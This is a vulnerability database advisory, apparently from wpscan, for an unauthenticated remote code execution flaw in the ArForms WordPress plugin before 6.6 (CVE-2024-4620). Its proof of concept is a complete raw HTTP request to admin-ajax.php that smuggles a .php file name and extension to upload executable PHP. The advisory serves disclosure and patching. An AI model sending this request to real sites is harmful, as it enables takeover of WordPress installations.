Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpvulndbMgthuramoemyintWPVDB-ID:DC34DC2D-D5A1-4E28-8507-33F659EAD647
HistoryMay 17, 2024 - 12:00 a.m.

ArForms < 6.6 - Unauthenticated RCE

2024-05-1700:00:00
mgthuramoemyint
wpscan.com
2
arforms
unauthenticated rce
file modification
php code upload

9.5 High

AI Score

Confidence

High

0.0004 Low

EPSS

Percentile

9.1%

JSON

Description The plugin allows unauthenticated users to modify uploaded files in such a way that PHP code can be uploaded when an upload file input is included on a form

PoC

1. Create a form with an upload input 2. As an unauthenticated user, upload an image file and intercept the request. 3. Modify it like the following: POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 Host: testbox User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br X_FILENAME: 3readme.php X-FILENAME: 3readme.php Content-Type: multipart/form-data; boundary=---------------------------231372247329806589063676810774 Content-Length: 1110 Origin: http://testbox Connection: close Referer: http://testbox/wordpress/index.php/2024/04/08/hello-world/ Cookie: wordpress_ba62313c33aedb7d46cae591be063de4=mirphak%7C17151795;wpforms_fields_group_settings_advanced=true; 45df-a0b7-fdcb263f17ee57190a; PHPSESSID=m0tplmmem0pm28kseu7iola5d7 \-----------------------------231372247329806589063676810774 Content-Disposition: form-data; name="action" arf_send_form_data \-----------------------------231372247329806589063676810774 Content-Disposition: form-data; name="frm" 100 \-----------------------------231372247329806589063676810774 Content-Disposition: form-data; name="field_id" gfeav2_58393 \-----------------------------231372247329806589063676810774 Content-Disposition: form-data; name="file_type" text/html \-----------------------------231372247329806589063676810774 Content-Disposition: form-data; name="types_arr" htm|html, jpg|jpeg|php \-----------------------------231372247329806589063676810774 Content-Disposition: form-data; name="is_preview" \-----------------------------231372247329806589063676810774 Content-Disposition: form-data; name="files"; filename="readme.html" Content-Type: text/html \-----------------------------231372247329806589063676810774 Content-Disposition: form-data; name="token" 72JcFplqUK \-----------------------------231372247329806589063676810774-- Access the file (in the example above it is 3readme.php) and see the PHP execute.

CPENameOperatorVersion
eq6.6

Related

wpexploit 1
cvelist 1
cve 1
nvd 1
wordfence 1
wpexploit
wpexploit
ArForms < 6.6 - Unauthenticated RCE
2024-05-17 00:00:00
cvelist
cvelist
CVE-2024-4620 ArForms < 6.6 - Unauthenticated RCE
2024-06-07 06:00:02
cve
cve
CVE-2024-4620
2024-06-07 06:15:11
nvd
nvd
CVE-2024-4620
2024-06-07 06:15:11
wordfence
wordfence
Wordfence Intelligence Weekly WordPress Vulnerability Report (May 13, 2024 to May 19, 2024)
2024-05-23 15:00:37

9.5 High

AI Score

Confidence

High

0.0004 Low

EPSS

Percentile

9.1%

JSON
Related for WPVDB-ID:DC34DC2D-D5A1-4E28-8507-33F659EAD647
wpexploit1cvelist1cve1nvd1wordfence1